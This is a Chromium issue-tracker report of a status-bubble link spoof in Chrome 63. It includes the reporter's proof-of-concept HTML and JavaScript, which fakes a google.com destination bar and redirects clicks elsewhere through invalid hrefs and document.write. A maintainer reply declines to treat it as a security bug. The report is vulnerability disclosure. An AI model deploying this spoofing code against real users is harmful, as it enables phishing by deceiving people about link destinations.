New issue
Advanced search Search tips

Issue 875302 link

Starred by 1 user
Status: Available
Owner: ----
Components:
EstimatedDays: ----
NextAction: ----
OS: Linux , Windows , Chrome , Mac
Pri: 2
Type: Bug



Sign in to add a comment

Link Alert (Status Bubble) Spoof

Reported by adri...@brztec.com, Aug 17 
UserAgent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36

Steps to reproduce the problem:
Hi team. I found a way to spoof the destination of a link in bottom page notification.

1. Open the attached poc.
2. Mouse over the links and you see https://www.google.com in the bottom page showing that apparently
 are the correct links.
3. Click in any link and a new tab will be openned with https://www.marvel.com.

*** PoC Code ***
<style>
  div{  
    display:none;  
  }  
  div:hover{  
    display:block;  
  }

div#fakelocation {
	display: none;
    height: 18px;
    width: 30%;
    overflow: visible;
    background-color: rgb(242,242,242);
    bottom: 0;
    position: fixed;
    left: 0;
    padding-top: 3px;
    padding-left: 2px;
    color: #868383;
    font-size: 13;
    border: 1px solid #e2e2e2;
    border-top-right-radius: 5px;
    border-bottom: 0px;
    font-family: Calibri, Candara, Segoe, "Segoe UI", Optima, Arial, sans-serif !important;
    font: small arial,sans-serif;
}  
</style>

<div id="fakelocation">https://www.google.com</div>
<br>
<a id="link1" name="link1" href="\\javascript:alert(1)" onclick="mouseClick()" onmouseover="mouseIn()" onmouseout="mouseOut()" target="_blank">www.google.com</a>
<br>
<a id="link4" name="link4" href="%00" onclick="mouseClick()" onmouseover="mouseIn()" onmouseout="mouseOut()" target="_blank">www.google.com</a>

<script>
function mouseIn() {document.getElementById("fakelocation").style.display = "inline";}
function mouseOut() {document.getElementById("fakelocation").style.display = "none";}
function mouseClick(){
	var fakeOpenDestino = window.open("\\javascript:alert(1)", "link1");
	fakeOpenDestino.document.write('<script>document.location.href="https://www.marvel.com";</' + 'script>');
	//setTimeout(function(){ fakeOpenDestino.close(); }, 50);
}
</script>

What is the expected behavior?
Chrome should be always show in bottom page the value of href attribute of a link (TAG A) even if invalid.

What went wrong?
Chrome dont show in bottom page the alert of the destination of a link when it is invalid allowing bad guys to spoof this alert tricking users to click on a trusted link that don't is.

Did this work before? N/A 

Chrome version: 63.0.3239.132  Channel: n/a
OS Version: 10.0
Flash Version:
poc.JPG
131 KB View Download
results.JPG
136 KB View Download
poc_linkcheck_spoof.html
1.4 KB View Download

Comment 1 by adri...@brztec.com, Aug 17 

Chrome pop-up settings.
Google_Chrome_Pop-up_config.JPG
46.7 KB View Download

Comment 2 by carlosil@chromium.org, Aug 17

Components: UI>Browser>StatusBubble
Labels: -Type-Bug-Security -Restrict-View-SecurityTeam OS-Chrome OS-Linux OS-Mac Type-Bug
Status: Available (was: Unconfirmed)
Summary: Link Alert (Status Bubble) Spoof (was: Link Alert Spoof)
Thanks for the report, as per https://www.chromium.org/user-experience/status-bubble we do not consider the status bubble a security surface, so this is not considered a security bug.

However, I'm not sure if this is actually WAI, so I'll assign the StatusBubble component so this can be triaged from that perspective.

Comment 3 by adri...@brztec.com, Aug 20 

Ok. But when a tag attribute has a invalid href values the status bubble should be showed?

Examples:
href="\\javascript:alert(1)"
href="%00"

Sign in to add a comment